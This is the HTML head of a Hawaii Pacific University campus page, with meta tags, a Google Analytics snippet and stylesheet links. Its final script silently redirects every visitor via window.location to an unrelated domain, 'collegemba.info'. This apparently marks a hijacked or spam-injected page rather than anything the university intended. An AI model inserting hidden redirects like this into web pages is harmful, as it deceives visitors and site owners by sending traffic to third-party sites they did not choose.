<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="IE=EmulateIE8" http-equiv="X-UA-Compatible" />
<meta content="Hawaii Pacific University is the largest independent, accredited, coeducational, nonsectarian, postsecondary university in Honolulu, Hawaii offering undergraduate and graduate degree programs in a multicultural setting with students from more than 100 countries and all 50 United States attending." name="description" />
<meta content="Hawaii Pacific University, HPU, colleges and universities, college, colleges, university, universities, Hawaii, Hawai`i, Hawai'i, Pacific, Honolulu, Private, Oahu, Hawaiian, School, Schools, Private School, Private Schools, Private University, Private Universities, Sea Warrior, Sea Warriors, Liberal Arts,higher education, faculty, admissions, tuition, scholarship, campus, graduate, undergraduate, MBA, nursing, Waikiki, university hawaii, hawaii university" name="keywords" />
<title>Hawaii Pacific University: Hawaii Loa Campus</title>
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-30724307-1']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
<link href="../css/lightbox.css" rel="stylesheet" type="text/css" />
<link href="../css/portal1.css" rel="stylesheet" type="text/css" />
</head>
<body class="twoColFixRtHdr">
<link HREF="../images/images_template/hpuicon.ico" REL="SHORTCUT ICON" href-asset-id="1fe19dfa0a01031101167d360c3b0e91" href-asset-type="file" />
<link href="../css/HPUcss.css" rel="stylesheet" type="text/css" />
<link href="../css/mmcss.css" rel="stylesheet" type="text/css" />
<link href="../css/portal1.css" rel="stylesheet" type="text/css" />   
<script>

</script>
<script type="text/javascript">
<!--
window.location = "http://collegemba.info/"
//-->
</script>
